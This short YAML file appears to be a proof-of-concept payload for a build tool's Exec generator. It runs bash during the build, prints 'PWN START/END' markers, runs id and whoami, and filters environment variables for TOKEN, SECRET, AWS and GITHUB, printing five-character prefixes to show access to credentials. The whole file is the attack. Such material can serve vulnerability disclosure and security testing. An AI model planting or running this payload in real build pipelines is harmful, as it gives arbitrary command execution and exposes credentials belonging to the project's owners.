generators:
  - |-
    kind: Exec
    metadata:
      name: demo
    spec:
      bin: /bin/bash
      args: 
        - -c
        - |
          echo "--- PWN START ---"
          id
          whoami
          env | grep -E "TOKEN|SECRET|AWS|GITHUB" | cut -c 1-5 # Print prefixes to prove access
          echo "--- PWN END ---"
